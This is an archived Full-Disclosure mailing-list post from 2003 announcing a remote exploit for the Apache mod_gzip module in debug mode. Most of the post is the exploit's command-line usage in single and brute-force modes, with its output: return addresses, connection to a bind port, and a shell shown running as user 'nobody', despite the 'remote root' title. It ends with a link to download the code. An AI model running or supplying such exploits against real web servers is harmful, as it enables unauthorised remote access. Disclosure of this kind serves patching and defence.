[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] Remote root exploit for mod_gzip (with debug_mode)
- To: <full-disclosure@lists.netsys.com>
- Subject: [Full-Disclosure] Remote root exploit for mod_gzip (with debug_mode)
- From: "Alexander Antipov" <pk95@yandex.ru>
- Date: Thu, 20 Nov 2003 22:28:42 +0300
Hi!
/ Single mode:
\
/ [crz@blacksand crz]$ ./85mod_gzip -t 0 -h localhost
\
/ remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
\ by xCrZx [crazy_einstein@yahoo.com] /
\ Using: ret_err = 0x42127480, ret = 0xbfffd8f0
/
\ [!] Connecting to localhost:80
/ [+] Connected!
\ [*] Trying to connect to localhost:2003 port!!! Pray for success!
/ [*] Sleeping at 2 seconds...
\
/ [!] Shell is accessible!
\
/ uid=99(nobody) gid=99(nobody) groups=99(nobody)
\ Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386
GNU/Linux
/
\ Brute mode:
/
\ [crz@blacksand crz]$ ./85mod_gzip -h localhost -b 0xbfffffff -s 1000
/
\ remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
/ by xCrZx [crazy_einstein@yahoo.com] /05.06.03/
\
/ Using: ret_err = 0x42127480, ret = 0xbfffffff ,step = 1000
\
/ [~] Brutemode activated!
\ .
/ [!] Shell is accessible!
\
/ uid=99(nobody) gid=99(nobody) groups=99(nobody)
\ Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386
GNU/Linux
Code can be download here:
http://www.securitylab.ru/41373.html